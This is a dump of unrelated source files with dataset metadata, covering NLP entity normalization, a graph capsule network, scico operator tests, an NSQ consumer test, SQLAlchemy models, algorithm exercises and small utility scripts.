Doc(entry)\n            entry.segment(segmenter)\n            normalized_entities += [entry.tokens]\n\n        entities_stem = []\n        norm_endings = []\n\n        for entity, norm in zip(entities, normalized_entities):\n            endings = []\n            stems = []\n            for token, token_norm in zip(entity, norm):\n                stem = self.get_stem(token.text)\n                ending = self.find_ending(token_norm.text, stem, is_normalization=True)\n                stems.append(stem)\n                endings.append(ending)\n            entities_stem.append(stems)\n            norm_endings.append(endings)\n\n        # print(len(normalized_entities), normalized_entities)\n        \"\"\"\n        for idx in range(len(entities)):\n            print(entities[idx], normalized_entities[idx])\"\"\"\n\n        return entities_stem, norm_endings\n\n    def get_stem(self, word):\n        if is_abbreviation(word):\n            return word\n        else:\n            word_stem = self.stemmer.stem(word)\n            if word[0].isupper():\n                word_stem = word_stem.capitalize()\n\n            return word_stem\n\n    # helper for obtaining the ending of a word\n    def find_ending(self, norm, word, is_normalization=False):\n        if is_abbreviation(norm):\n            return ''\n        else:\n            word_stem = self.stemmer.stem(norm)\n            if norm[0].isupper():\n                word_stem = word_stem.capitalize()\n            if norm == word:\n                return ''\n            else:\n                ending = norm.replace(word_stem, '')\n\n                if norm != ending:\n                    if is_normalization:\n                        self.normalization_endings.append(ending)\n                    else:\n                        self.endings.append(ending)\n                    return ending\n                else:\n                    return ''\n\ndef collect_sentences_for_sequence_tagging():\n    reader = RuNormASReaderForSequenceTagging()\n\n    entities_train = []\n    endings_train = []\n\n    entities_eval = []\n    endings_eval = []\n\n    filenames = []\n    for _, _, files in os.walk(\"../data/train_new/named/texts_and_ann\"):\n        for filename in sorted(files):\n            filenames.append(filename.split('.')[0])\n\n    filenames = sorted(set(filenames), reverse=True)\n\n    train = filenames[:2000]\n    eval = filenames[2000:]\n\n    for filename in tqdm.tqdm(train, total=len(train)):\n        text_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".txt\"\n        annotation_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".ann\"\n        normalization_filename = \"data/train_new/named/norm/\" + filename + \".norm\"\n        document_entities, document_normalization = reader.read(text_filename, annotation_filename, normalization_filename)\n\n        if len(document_entities) != len(document_normalization):\n            print(filename)\n            print('---------')\n\n        entities_train += document_entities\n        endings_train += document_normalization\n\n    for filename in tqdm.tqdm(eval, total=len(eval)):\n        text_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".txt\"\n        annotation_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".ann\"\n        normalization_filename = \"data/train_new/named/norm/\" + filename + \".norm\"\n        document_entities, document_normalization = reader.read(text_filename, annotation_filename,\n                                                                normalization_filename)\n\n        if len(document_entities) != len(document_normalization):\n            print(filename)\n            print('---------')\n\n        entities_eval += document_entities\n        endings_eval += document_normalization\n\n    
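# make sure the empty (\"no change\") ending is part of the label inventory before deduplicating\n    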
reader.normalization_endings.append('')\n reader.normalization_endings.append('')\n reader.normalization_endings = set(reader.normalization_endings)\n\n return entities_train, endings_train, entities_eval, endings_eval, reader.normalization_endings\n\nif __name__ == '__main__':\n entities_train, endings_train, entities_eval, endings_eval, normalization_endings = collect_sentences_for_sequence_tagging()\n\n counter = 0\n for entity, norm in zip(entities_train, endings_train):\n print(entity, norm)\n counter += 1\n if counter == 100:\n break\n\n\n\n \"\"\"\n text_filename = \"data/train_new/named/texts_and_ann/970431.txt\"\n annotation_filename = \"data/train_new/named/texts_and_ann/970431.ann\"\n normalization_filename = \"data/train_new/named/norm/970431.norm\"\n reader = RuNormASReaderForSequenceTagging()\n document_entities, document_normalization, = reader.read(text_filename, annotation_filename, normalization_filename)\n\n for entity, norm in zip(document_entities, document_normalization):\n print(entity, norm)\"\"\"","sub_path":"deprecated_code/reader_without_context.py","file_name":"reader_without_context.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"593418146","text":"import time\n\nimport numpy as np\n\nimport controllers.polarization as p_ctrl\n\nt_t = lambda b, t, vec: np.multiply(vec[0], t) + np.multiply(vec[1], b)\n\nlogfile = open(\"logfile_transform_jo_vec.txt\", mode=\"a\")\nlogfile.write(\"\\n\\r\\n\\r\" + time.asctime() + \"\\n\")\n\n\ndef main():\n p1 = [-1, 1, 0]\n s1 = [1, -1, 0]\n p1 = p1 / np.linalg.norm(p1)\n s1 = s1 / np.linalg.norm(s1)\n p = np.asarray([1, 1, 0])\n s = np.asarray([-1, 1, 0])\n p = p / np.linalg.norm(p)\n s = s / np.linalg.norm(s)\n t = [1, 0, 0]\n b = [0, 1, 0]\n jo_v = [1, 1]\n test_and_log(p, s, p1, s1, jo_v)\n\n\ndef test_and_log(t, b, p, s, jo_v):\n res1 = p_ctrl.transform_jo_vec_equation(b, t, s, p, jo_v)\n res2 = p_ctrl.transform_jo_vec(b, t, s, p, jo_v)\n res3 = t_t(s, p, res1)\n res4 = t_t(s, p, res2)\n res = t_t(b, t, jo_v)\n print(f\"from\\nt = {t}\\nb = {b}\\njo_v_tb = {jo_v}\\ncoords = {res}\\n\" +\n f\"to\\np = {p}\\ns = {s}\\njo_v_ps eq = {res1}\\njo_v_ps = {res2}\\n\" +\n f\"coords sp eq = {res3}\\ncoords sp = {res4}\\n\" +\n f\"diff = {res3 - res4}\\n\" +\n f\"diff eq tr {res - res3}\\n\" +\n f\"diff tr {res - res4}\", file=logfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/testing/coord_transform.py","file_name":"coord_transform.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"79318283","text":"class Solution:\n \n # Greedy Enumeration (go down faster) [96%]\n def numSquares(self, n):\n print(\"Greedy Enumeration (Solution)\")\n def is_divided_by(n, count):\n \"\"\"\n return: true if \"n\" can be decomposed into \"count\" number of perfect square numbers.\n e.g. 
n=12, count=3: true.\n n=12, count=2: false\n \"\"\"\n if count == 1:\n return n in square_nums\n \n for k in square_nums:\n if is_divided_by(n - k, count - 1):\n return True\n return False\n\n square_nums = set([i * i for i in range(1, int(n**0.5)+1)])\n \n for count in range(1, n+1):\n if is_divided_by(n, count):\n return count\n \n #===========================================\n \n # Bottom-up DP (Solution) [O(N*sqrtN), 44%]\n def numSquares2(self, n):\n print(\"Bottom-Up DP (Solution)\")\n square_nums = [i**2 for i in range(0, int(math.sqrt(n))+1)]\n \n dp = [float('inf')] * (n+1)\n # bottom case\n dp[0] = 0\n \n for i in range(1, n+1):\n for square in square_nums:\n if i < square:\n break\n dp[i] = min(dp[i], dp[i-square] + 1)\n \n return dp[-1]\n \n #===========================================\n\n # Bottom-up DP [O(N*sqrtN), 58%]\n def numSquares2(self, n: int) -> int:\n print(\"Bottom-Up DP\")\n if n == 1:\n return 1\n \n # Prepare the array for square numbers\n arr = []\n for e in range(1, n):\n if pow(e, 2) > n:\n break\n arr.append(pow(e, 2))\n \n # Initialization\n res = [0] * (n + 1)\n res[1] = 1 \n \n # DP loop \n for i in range(2, n + 1):\n minValue = float('inf')\n for j in range(len(arr)): #Loop all the number smaller than current \n if arr[j] > i:\n break\n idx = i - arr[j]\n if res[idx] < minValue:\n minValue = res[idx]\n res[i] = minValue + 1\n # Debug \n # for i, v in enumerate(res):\n # print(i, \":\", v)\n \n return res[n]\n \n #===========================================\n \n # Memoization [TLE]\n def numSquares2(self, n: int) -> int:\n print(\"Top-Down DP\")\n if n == 1:\n return 1\n \n arr = []\n for e in range(1, n):\n if pow(e, 2) > n:\n break\n arr.append(pow(e, 2))\n #arr = arr[::-1]\n #print(arr)\n dic = {0:0, 1:1}\n \n ans = self.helper(arr, n, dic)\n #print(dic)\n return ans\n \n def helper(self, arr, target, memo):\n #print(\"target:\", target, memo)\n if target == 0:\n return 0\n elif target == 1:\n return 1\n elif target < 0:\n return 99999\n \n if target in memo:\n return memo[target]\n \n minValue = float('inf')\n for i in range(len(arr)):\n minValue = min(minValue, 1 + self.helper(arr, target-arr[i], memo))\n \n memo[target] = minValue\n #print(\"**memo[target]:\", memo[target])\n return memo[target]","sub_path":"algo/dp/_0279_PerfectSquares.py","file_name":"_0279_PerfectSquares.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553027355","text":"import asyncio\nimport sys\n\nfrom asyncnsq.consumer import NsqConsumer\nfrom asyncnsq.http import Nsqd\nfrom asyncnsq.http.exceptions import NotFoundError\nfrom asyncnsq.nsq import create_nsq\n\nfrom ._testutils import BaseTest, run_until_complete\n\n\nclass NsqTest(BaseTest):\n def setUp(self):\n self.topic = 'foo'\n self.host = '127.0.0.1'\n self.port = 4150\n self.lookupd_port = 4161\n self.max_in_flight = 25\n self.total_test_msgs = 100\n self.test_range = range(1, self.total_test_msgs + 1)\n super().setUp()\n\n async def aioSetUp(self):\n self.producer = Nsqd(self.host, self.port+1, loop=self.loop)\n self.consumer = NsqConsumer(nsqd_tcp_addresses=[(self.host,\n self.port)],\n max_in_flight=self.max_in_flight,\n loop=self.loop)\n\n for i in self.test_range:\n await self.producer.pub(self.topic, 'xxx:{}'.format(i))\n\n await asyncio.sleep(0.1, loop=self.loop)\n\n await self.consumer.connect()\n\n async def aioTearDown(self):\n await self.consumer.close()\n try:\n await self.producer.delete_topic(self.topic)\n 
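# the test topic may already be gone; the nsqd HTTP API reports that as NotFoundError\n        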
except NotFoundError:\n pass\n finally:\n await self.producer.close()\n\n @run_until_complete\n async def test_consumer_waiters(self):\n await self.consumer.subscribe(self.topic, 'test_consumer')\n\n msgs = []\n\n for counter, waiter in enumerate(self.consumer.wait_messages(), 1):\n if self.consumer.is_starved():\n for msg in msgs:\n self.assertIn(int(msg.text().split(':')[-1]),\n self.test_range)\n await msg.fin()\n msgs = []\n\n if counter <= self.total_test_msgs:\n msg = await waiter\n msgs.append(msg)\n continue\n\n break\n\n @run_until_complete\n async def test_consumer_async_for(self):\n await self.consumer.subscribe(self.topic, 'test_consumer')\n\n if sys.version_info >= (3, 6):\n counter = 1\n\n async for msg in self.consumer.messages():\n if counter == self.total_test_msgs:\n break\n\n counter += 1\n self.assertIn(int(msg.text().split(':')[-1]),\n self.test_range)\n await msg.fin()\n\n else:\n with self.assertRaises(AttributeError):\n self.consumer.messages()\n\n @run_until_complete\n async def test_wait_for_topic(self):\n lookupd_addresses = [(self.host, self.lookupd_port)]\n self.consumer = NsqConsumer(lookupd_http_addresses=lookupd_addresses,\n max_in_flight=self.max_in_flight,\n lookupd_poll_interval=2,\n loop=self.loop)\n\n nonexistent_topic = 'moo'\n sub_coro = self.consumer.subscribe(nonexistent_topic, 'bar')\n sub_task = self.loop.create_task(sub_coro)\n\n await asyncio.sleep(1)\n\n await self.producer.pub(nonexistent_topic, 'test_msg')\n\n await sub_task\n\n msg = await self.consumer._queue.get()\n\n self.assertEqual('test_msg', msg.text())\n","sub_path":"tests/test_consumer.py","file_name":"test_consumer.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"54061965","text":"from datetime import date, datetime\nfrom typing import Union\n\nfrom sqlalchemy import (Boolean, Column, Date, DateTime, ForeignKey, Integer,\n SmallInteger, String)\nfrom sqlalchemy.ext.orderinglist import ordering_list\nfrom sqlalchemy.orm import relationship\n\nfrom .base import PkModel, PkModelWithTimestamps\nfrom .relation_table import product_paintwork_table, product_sculptor_table\n\n__all__ = [\n \"ProductOfficialImage\",\n \"ProductReleaseInfo\",\n \"Product\"\n]\n\n\nclass ProductOfficialImage(PkModel):\n __tablename__ = \"product_official_image\"\n\n url = Column(String)\n order = Column(Integer)\n product_id = Column(Integer, ForeignKey(\"product.id\", ondelete=\"CASCADE\"), nullable=False)\n\n @classmethod\n def create_image_list(cls: 'ProductOfficialImage', image_urls: list[str]) -> list['ProductOfficialImage']:\n images = []\n\n for url in image_urls:\n image = ProductOfficialImage(url=url)\n images.append(image)\n\n return images\n\n\nclass ProductReleaseInfo(PkModelWithTimestamps):\n __tablename__ = \"product_release_info\"\n\n price = Column(Integer)\n tax_including = Column(Boolean)\n initial_release_date = Column(Date, nullable=True)\n delay_release_date = Column(Date)\n announced_at = Column(Date)\n shipped_at = Column(Date)\n product_id = Column(Integer, ForeignKey(\"product.id\", ondelete=\"CASCADE\"), nullable=False)\n\n def postpone_release_date_to(self, delay_date: Union[date, datetime, None]):\n if not delay_date:\n return\n\n if isinstance(delay_date, datetime):\n delay_date = delay_date.date()\n\n valid_type = isinstance(delay_date, date)\n if not valid_type:\n raise TypeError(f\"{delay_date} must be `date` or `datetime`\")\n\n has_init_release_date = 
bool(self.initial_release_date)\n\n if not has_init_release_date:\n self.update(delay_release_date=delay_date)\n if has_init_release_date:\n if self.initial_release_date < delay_date:\n self.update(delay_release_date=delay_date)\n if self.initial_release_date > delay_date:\n raise ValueError(\n f\"delay_date {delay_date} should be later than initial_release_date {self.initial_release_date}\"\n )\n\n def stall(self):\n self.update(initial_release_date=None, delay_release_date=None)\n\n\nclass Product(PkModelWithTimestamps):\n \"\"\"\n ## Column\n + checksum: MD5 value, one of methods to check the product should be updated.\n \"\"\"\n __tablename__ = \"product\"\n\n # ---native columns---\n name = Column(String, nullable=False)\n size = Column(SmallInteger)\n scale = Column(SmallInteger)\n resale = Column(Boolean)\n adult = Column(Boolean)\n copyright = Column(String)\n url = Column(String)\n jan = Column(String(13), unique=True)\n id_by_official = Column(String)\n checksum = Column(String(32))\n order_period_start = Column(DateTime(timezone=True))\n order_period_end = Column(DateTime(timezone=True))\n thumbnail = Column(String)\n og_image = Column(String)\n\n # ---Foreign key columns---\n series_id = Column(Integer, ForeignKey(\"series.id\"))\n series = relationship(\n \"Series\",\n backref=\"products\",\n lazy=\"joined\",\n )\n\n category_id = Column(Integer, ForeignKey(\"category.id\"))\n category = relationship(\n \"Category\",\n backref=\"products\",\n lazy=\"joined\",\n )\n\n manufacturer_id = Column(Integer, ForeignKey(\"company.id\"))\n manufacturer = relationship(\n \"Company\",\n backref=\"made_products\",\n primaryjoin=\"Product.manufacturer_id == Company.id\",\n lazy=\"joined\"\n )\n\n releaser_id = Column(Integer, ForeignKey(\"company.id\"))\n releaser = relationship(\n \"Company\",\n backref=\"released_products\",\n primaryjoin=\"Product.releaser_id == Company.id\",\n lazy=\"joined\"\n )\n\n distributer_id = Column(Integer, ForeignKey(\"company.id\"))\n distributer = relationship(\n \"Company\",\n backref=\"distributed_products\",\n primaryjoin=\"Product.distributer_id == Company.id\",\n lazy=\"joined\"\n )\n # ---relationships field---\n release_infos = relationship(\n ProductReleaseInfo,\n backref=\"product\",\n order_by=\"nulls_first(asc(ProductReleaseInfo.initial_release_date))\",\n cascade=\"all, delete\",\n passive_deletes=True,\n )\n official_images = relationship(\n ProductOfficialImage,\n backref=\"product\",\n order_by=\"ProductOfficialImage.order\",\n collection_class=ordering_list(\"order\", count_from=1),\n cascade=\"all, delete\",\n passive_deletes=True\n )\n sculptors = relationship(\n \"Sculptor\",\n secondary=product_sculptor_table,\n backref=\"products\",\n lazy=\"joined\",\n )\n paintworks = relationship(\n \"Paintwork\",\n secondary=product_paintwork_table,\n backref=\"products\",\n lazy=\"joined\",\n )\n\n def last_release(self) -> Union[ProductReleaseInfo, None]:\n release_infos = self.release_infos\n if release_infos:\n return release_infos[-1]\n return None\n\n def check_checksum(self, checksum: str) -> bool:\n return checksum == self.checksum\n","sub_path":"libs/figure_hook/src/figure_hook/Models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420937044","text":"import numpy as np\n\nimport jax\n\nimport pytest\n\nfrom scico.linop import Convolve, Identity, LinearOperatorStack\nfrom scico.test.linop.test_linop import 
adjoint_AAt_test, adjoint_AtA_test\n\n\nclass TestLinearOperatorStack:\n def setup_method(self, method):\n self.key = jax.random.PRNGKey(12345)\n\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_construct(self, jit):\n # requires a list of LinearOperators\n I = Identity((42,))\n with pytest.raises(ValueError):\n H = LinearOperatorStack(I, jit=jit)\n\n # checks input sizes\n A = Identity((3, 2))\n B = Identity((7, 2))\n with pytest.raises(ValueError):\n H = LinearOperatorStack([A, B], jit=jit)\n\n # in general, returns a BlockArray\n A = Convolve(np.ones((3, 3)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == ((11, 17), (10, 16))\n\n # ... result should be [A@x, B@x]\n assert np.allclose(y[0], A @ x)\n assert np.allclose(y[1], B @ x)\n\n # by default, collapse to DeviceArray when possible\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == (2, 10, 16)\n\n # ... result should be [A@x, B@x]\n assert np.allclose(y[0], A @ x)\n assert np.allclose(y[1], B @ x)\n\n # let user turn off collapsing\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=False, jit=jit)\n x = np.ones((9, 15))\n y = H @ x\n assert y.shape == ((10, 16), (10, 16))\n\n @pytest.mark.parametrize(\"collapse\", [False, True])\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_adjoint(self, collapse, jit):\n # general case\n A = Convolve(np.ones((3, 3)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n adjoint_AtA_test(H, self.key)\n adjoint_AAt_test(H, self.key)\n\n # collapsable case\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n adjoint_AtA_test(H, self.key)\n adjoint_AAt_test(H, self.key)\n\n @pytest.mark.parametrize(\"collapse\", [False, True])\n @pytest.mark.parametrize(\"jit\", [False, True])\n def test_algebra(self, collapse, jit):\n # adding\n A = Convolve(np.ones((2, 2)), (9, 15))\n B = Convolve(np.ones((2, 2)), (9, 15))\n H = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n\n A = Convolve(np.random.rand(2, 2), (9, 15))\n B = Convolve(np.random.rand(2, 2), (9, 15))\n G = LinearOperatorStack([A, B], collapse=collapse, jit=jit)\n\n x = np.ones((9, 15))\n S = H + G\n\n # test correctness of adding\n assert S.output_shape == H.output_shape\n assert S.input_shape == H.input_shape\n np.testing.assert_allclose((S @ x)[0], (H @ x + G @ x)[0])\n np.testing.assert_allclose((S @ x)[1], (H @ x + G @ x)[1])\n\n # result of adding two conformable stacks should be a stack\n assert isinstance(S, LinearOperatorStack)\n assert isinstance(H - G, LinearOperatorStack)\n\n # scalar multiplication\n assert isinstance(1.0 * H, LinearOperatorStack)\n\n # op scaling\n scalars = [2.0, 3.0]\n y1 = S @ x\n S2 = S.scale_ops(scalars)\n y2 = S2 @ x\n\n np.testing.assert_allclose(scalars[0] * y1[0], y2[0])\n","sub_path":"scico/test/linop/test_stack.py","file_name":"test_stack.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191151710","text":"\"\"\"CapsGNN layers.\"\"\"\nfrom functools import partial\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import 
Variable\nfrom denseGCNConv import DenseGCNConv\nimport torch.nn.functional as F\nfrom torch_geometric.nn.inits import glorot\nfrom disentangle import linearDisentangle\n\n\ndef squash(input_tensor, dim=-1, epsilon=1e-7):\n squared_norm = (input_tensor ** 2).sum(dim=dim, keepdim=True)\n safe_norm = torch.sqrt(squared_norm + epsilon)\n scale = squared_norm / (1 + squared_norm)\n unit_vector = input_tensor / safe_norm\n return scale * unit_vector\n\ndef sparse2dense(x, new_size, mask):\n out = torch.zeros(new_size).cuda()\n out[mask] = x\n return out\n\nclass firstCapsuleLayer(torch.nn.Module):\n def __init__(self, number_of_features, max_node_num, capsule_dimensions, disentangle_num, dropout):\n super(firstCapsuleLayer, self).__init__()\n\n self.number_of_features = number_of_features\n self.max_node_num = max_node_num\n self.capsule_dimensions = capsule_dimensions\n self.disentangle_num = disentangle_num\n self.dropout = nn.Dropout(p=dropout)\n\n self.bns_disen = nn.BatchNorm1d(self.number_of_features)\n self.disen = torch.nn.ModuleList()\n for i in range(self.disentangle_num):\n self.disen.append(linearDisentangle(self.number_of_features, self.capsule_dimensions//self.disentangle_num))\n\n def forward(self, x, adj, mask, batch):\n x_size = x.size()\n x = x[mask] # (N1+N2+...+Nm)*d\n out = []\n x = self.bns_disen(x)\n for i, disen in enumerate(self.disen):\n temp = F.relu(disen(x))\n temp = self.dropout(temp)\n out.append(temp)\n\n # Combine features from the K different spaces\n out = torch.cat(out, dim=-1)\n out = sparse2dense(out, (x_size[0], x_size[1], out.size(-1)), mask) # [Batch*N*hidden]\n out = squash(out)\n return out\n\n\nclass SecondaryCapsuleLayer(torch.nn.Module):\n def __init__(self, num_iterations, num_routes, num_capsules, in_channels, out_channels, dropout):\n super(SecondaryCapsuleLayer, self).__init__()\n self.num_prim_cap = num_routes\n self.num_digit_cap = num_capsules\n self.in_cap_dim = in_channels\n self.out_cap_dim = out_channels\n self.dropout = nn.Dropout(p=dropout)\n self.num_iterations = num_iterations\n self.bn_feat = nn.BatchNorm1d(self.in_cap_dim)\n self.convs = torch.nn.ModuleList()\n for i in range(self.num_digit_cap): \n self.convs.append(DenseGCNConv(self.in_cap_dim, self.out_cap_dim))\n \n def forward(self, x, adj, mask=None):\n batch_size = x.size(0) # [bs, num_prim_caps, prim_cap_dim]\n \n if mask is not None:\n x_size = x.size()\n x = x[mask] # (N1+N2+...+Nm)*d\n x = self.bn_feat(x)\n x = sparse2dense(x, x_size, mask)\n else:\n x = x.view(-1, self.in_cap_dim)\n x = self.bn_feat(x)\n x = x.view(batch_size, -1, self.in_cap_dim)\n \n u_hat = []\n for i, conv in enumerate(self.convs):\n if mask is not None:\n temp = conv(x, adj, mask)\n else:\n temp = conv(x, adj)\n u_hat.append(temp)\n u_hat = torch.stack(u_hat, dim=2).unsqueeze(4)\n\n # detach u_hat during routing iterations to prevent gradients from flowing\n temp_u_hat = u_hat.detach()\n\n b_ij = torch.zeros(batch_size, u_hat.size(1), u_hat.size(2), 1, 1).cuda()\n for i in range(self.num_iterations - 1):\n c_ij = F.softmax(b_ij, dim=2)\n s_j = (c_ij * temp_u_hat).sum(dim=1, keepdim=True) # [bs, 1, 10, 16, 1]\n v = squash(s_j, dim=-2)\n\n u_produce_v = torch.matmul(temp_u_hat.transpose(-1, -2), v)\n b_ij = b_ij + u_produce_v # [bs, 1152, 10, 1, 1]\n \n c_ij = F.softmax(b_ij, dim=2)\n s_j = (c_ij * u_hat).sum(dim=1, keepdim=True)\n \n # Residual connection\n s_j += torch.mean(x, dim=1)[:,None, None,:,None]\n\n v = squash(s_j, dim=-2)\n c_ij = c_ij.squeeze(4).squeeze(3)\n\n if mask is not None:\n c_ij 
= c_ij * mask[:, :, None]\n\n        # update the adjacency matrix\n        adj = torch.transpose(c_ij, 2, 1) @ adj @ c_ij\n        return v, c_ij, adj\n\n\nclass ReconstructionNet(nn.Module):\n    def __init__(self, n_dim, n_classes, hidden):\n        super(ReconstructionNet, self).__init__()\n        self.n_dim = n_dim\n        self.n_classes = n_classes\n        self.fc1 = nn.Linear(n_dim * n_classes, hidden)\n\n    def forward(self, first_capsule, class_capsule, y):\n        mask = torch.zeros((class_capsule.size(0), self.n_classes))\n        mask = mask.cuda()\n        mask.scatter_(1, y.view(-1, 1), 1.)\n        mask = mask.unsqueeze(2)\n        class_capsule = class_capsule * mask\n        class_capsule = class_capsule.view(-1, 1, self.n_dim * self.n_classes)\n\n        # combine the first capsule and the class capsule (class-conditional)\n        N = first_capsule.size(1)\n        class_capsule = F.relu(self.fc1(class_capsule))\n        x = first_capsule + class_capsule\n        x = torch.matmul(x, torch.transpose(x, 2, 1))\n        return x","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"320131692","text":"# Given an integer rectangular matrix,\r\n# compute the sum of the negative elements whose indices are both even.\r\n\r\nfrom random import randint\r\nn=int(input(\"Number of rows: \"))\r\nm=int(input(\"Number of columns: \"))\r\nmatrix = [[randint(-20, 20) for j in range(m)] for i in range(n)]\r\nprint(matrix)\r\n\r\nd = 0\r\nfor i in range(n):\r\n    for j in range(m):\r\n        if i%2 == 0 and j%2 == 0:\r\n            if matrix[i][j]<0:\r\n                d += matrix[i][j]\r\nprint(f\"Sum of the negative matrix elements with both indices even = {d}\")\r\n","sub_path":"lab7/lab7z1.py","file_name":"lab7z1.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"363007880","text":"#!/usr/bin/env python\n\n# IMPORT Python Libs\nimport os\nimport sys\n\n# IMPORT SQLAlchemy Dependencies\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, DateTime, Integer, String\nfrom sqlalchemy.sql import func\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.exc import SQLAlchemyError\n\n# # Import Scripts\n# import lf_connect\n#\n# engine, Base = lf_connect.connect()\nengine = create_engine('postgresql://postgres:postgres@129.25.140.165:5432/postgres')\nBase = declarative_base()\n\nclass Job(Base):\n    __tablename__ = 'job'\n\n    id = Column(Integer, primary_key=True)\n    name = Column(String(1000), nullable=False)\n    frange = Column(String(10), nullable=False)\n    projdir = Column(String(1000), nullable=False)\n    filepath = Column(String(1000), nullable=False)\n    imagedir = Column(String(1000), nullable=False)\n    status = Column(String(12), default='WAITING', nullable=False)\n    time_created = Column(DateTime(timezone=True), server_default=func.now())\n\n    def __init__(self, name, frange, projdir, filepath, imagedir):\n        self.name = name\n        self.frange = frange\n        self.projdir = projdir\n        self.filepath = filepath\n        self.imagedir = imagedir\n\nBase.metadata.create_all(engine)\nSession = sessionmaker(bind=engine)\nsesh = Session()\n\n\n# Add new Job listing to the DB session\ndef addJob(name, frange, projdir, filepath, imagedir):\n    job = Job(\n        name=name,\n        frange=frange,\n        projdir=projdir,\n        filepath=filepath,\n        imagedir=imagedir\n    )\n    sesh.add(job)\n    return job\n\n\n# Commit Session changes to the DB\n# Rollback any changes upon Error\ndef 
commitSession():\n    try:\n        sesh.commit()\n    except SQLAlchemyError as error:\n        sesh.rollback()\n        print (str(error))\n\n\n\n# TESTING : Print out DB\ndef getJobs():\n    for j in sesh.query(Job).all():\n        print ('name: %s' % j.name)\n        print ('frame range: %s' % j.frange)\n        print ('project dir: %s' % j.projdir)\n        print ('file path: %s' % j.filepath)\n        print ('image dir: %s' % j.imagedir)\n        print ('status: %s' % j.status)\n        print ('created: %s' % j.time_created)\n\n\n# Pass Job id, removes from Job Table\ndef deleteJobById(id):\n    sesh.query(Job).filter_by(id=id).delete()\n    commitSession()\n\n\n# Pass Table Object to delete a table\n# RISKY FUNCTION\ndef deleteTable(tb):\n    tb.__table__.drop(engine)\n    commitSession()\n\n\n# Execute the Main Event Loop\nif __name__ == \"__main__\":\n    # addJob(\n    #     'LAW_xyz_010_TEST',\n    #     '1-120',\n    #     'C:/Users/IanHartman',\n    #     'C:/Users/IanHartman/scenes',\n    #     'C:/Users/IanHartman/images'\n    # )\n    # commitSession()\n    getJobs()\n    engine.dispose()\n","sub_path":"LobsterFarm.py","file_name":"LobsterFarm.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"481694790","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n# Config.py\n#\n# @author chenzhao\n# @since 2017-12-02\n\n\"\"\"\nConfiguration loading and management\n\"\"\"\n\nimport configparser\nimport os\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nENV = 'local'  # allowed values: local, dev\n\nProperties = configparser.ConfigParser()\nProperties.read(\"{}/resources/{}/default.conf\".format(PROJECT_ROOT, ENV))\n\n\ndef getValue(section, field):\n    \"\"\"\n    Return the String value for the given section and field\n\n    :param section:\n    :param field:\n    :return:\n    \"\"\"\n    try:\n        return Properties.get(section, field)\n    except Exception as e:\n        raise Exception(\"Error reading section {} field {}\".format(section, field))\n\n\ndef getIntValue(section, field):\n    \"\"\"\n    Return the Int value for the given section and field\n\n    :param section:\n    :param field:\n    :return:\n    \"\"\"\n    try:\n        return Properties.getint(section, field)\n    except Exception as e:\n        raise Exception(\"Error reading section {} field {}\".format(section, field))\n\n\ndef getBooleanValue(section, field):\n    \"\"\"\n    Return the Boolean value for the given section and field\n\n    :param section:\n    :param field:\n    :return:\n    \"\"\"\n    try:\n        return Properties.getboolean(section, field)\n    except Exception as e:\n        raise Exception(\"Error reading section {} field {}\".format(section, field))\n\n\ndef getFloatValue(section, field):\n    \"\"\"\n    Return the Float value for the given section and field\n\n    :param section:\n    :param field:\n    :return:\n    \"\"\"\n    try:\n        return Properties.getfloat(section, field)\n    except Exception as e:\n        raise Exception(\"Error reading section {} field {}\".format(section, field))\n","sub_path":"api/base/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
